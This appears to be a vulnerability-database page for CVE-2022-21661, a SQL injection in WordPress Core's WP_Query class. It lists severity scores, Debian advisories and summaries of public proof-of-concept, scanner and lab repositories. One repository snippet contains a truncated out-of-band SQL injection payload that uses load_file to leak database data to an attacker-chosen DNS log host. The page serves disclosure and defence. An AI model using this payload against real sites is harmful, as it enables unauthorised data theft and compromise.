7.5
CVSSv3

CVE-2022-21661

Published: 06/01/2022 Updated: 07/11/2023
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 448
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

This vulnerability allows remote malicious users to disclose sensitive information on affected installations of WordPress Core. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WP_Query class. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

wordpress wordpress

fedoraproject fedora 34

fedoraproject fedora 35

debian debian linux 9.0

debian debian linux 10.0

debian debian linux 11.0

Vendor Advisories

Debian Bug report logs - #1003243 wordpress: WordPress 583 Security Release Package: wordpress; Maintainer for wordpress is Craig Small <csmall@debianorg>; Source for wordpress is src:wordpress (PTS, buildd, popcon) Reported by: Craig Small <csmall@debianorg> Date: Thu, 6 Jan 2022 21:48:01 UTC Severity: grave T ...
Several vulnerabilities were discovered in Wordpress, a web blogging tool They allowed remote attackers to perform SQL injection, run unchecked SQL queries, bypass hardening, or perform Cross-Site Scripting (XSS) attacks For the oldstable distribution (buster), these problems have been fixed in version 5015+dfsg1-0+deb10u1 For the stable distr ...

Exploits

WordPress Core version 582 suffers from a remote SQL injection vulnerability ...

Github Repositories

Wordpress 5.8.2 CVE-2022-21661 Vuln enviroment POC exploit

Wordpress 582 CVE-2022-21661 Vuln enviroment This enviroment is setup with the Elementor Custom Skin, plugin to test the CVE-2022-21661 to start the enviroment console wp-lab$ /startsh To get the admin password get the log from the running container, a new pwd is generated every time the container is booted console $wp-lab$ docker logs

CVE-2022-21661 exp for Elementor custom skin.

CVE-2022-21661 CVE-2022-21661 exploit for Elementor custom skin

wordpress-CVE-2022-21661 #version<583 path:your target/wp-admin/admin-ajaxphp The injection type is out-of-band, you need to specify dnslog yourself and replace ceyeio POST- DATA:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'27s601

WordPress WP_Query SQL Injection POC

CVE-2022-21661 1简介 WordPress v41~v582 WP_Query SQL Injection POC 2用法 poc -h 19216811 // 单个扫描 poc -f hosttxt // 批量扫描 3免责声明 此工具仅用于学习、研究和自查。 不应用于非法目的,请遵守相关法律法规。 使用本工具产生的任何风险与本人无关!

CSEC302-Demo-Tommy CVE-2022-21661 WordPress SQL Injection Vulnerability It is common for WordPress plugins to be vulnerable, but what is so special about this vulnerability is that it is actually in WordPress itself Since this vulnerability is in WordPress, you will likely need to install xampp or some other Apache web server in order to run the php files and set up WordPress

Study and exploit the vulnerability CVE-2022-21661 that allows SQL Injections through plugins POST requests to WordPress versions below 5.8.3.

SSI-CVE-2022-21661 Information System's Security 2nd Assignment Study and exploit the vulnerability CVE-2022-21661 that allows SQL Injections through plugins POST requests to WordPress versions below 583 Configuring the environment To start and configure the environment, you should just run: docker-compose run --rm wordpress-cli Re

The first poc video presenting the sql injection test from ( WordPress Core 5.8.2-'WP_Query' / CVE-2022-21661)

CVE-2022-21661 POC Video | WordPress Core 582 - 'WP_Query' SQL Injection CVE-2022-21661 EDB : wwwexploit-dbcom/exploits/50663

A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC

CVE-2022-21661-PoC A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC Installation pip3 install -r requirementstxt Usage usage: mainpy [-h] [-u URL] [-f FILE] Identify CEV-2022-21661 in Wordpress instances options: -h, --help show this help message and exit -u URL, --url URL A single URL to check -

CVE-2022-21661 POC Video | WordPress Core 582 - 'WP_Query' SQL Injection CVE-2022-21661 EDB : wwwexploit-dbcom/exploits/50663

Script to validate WordPress CVE-2022-21661

WordPress CVE-2022-21661 Scanner Usage python wordpress_scannerpy -H <host or ip address> -p <port> -ssl <support ssl/tls> -proxy <proxy address> -path <custom path> Help WordPress Scanner for CVE-2022-21661 options: -h, --help show this help message and e

WordPress Core 5.8.2 - 'WP_Query' SQL Injection

CVE-2022-21661 WordPress-Core-582-WP_Query-SQL-Injection Exploit WordPress Core 582 - 'WP_Query' SQL Injection Description: WordPress is a free and open-source content management system written in PHP and paired with a MariaDB database Due to improper sanitization in WP_Query, there can be cases where SQL injection is possible through plugins or themes that use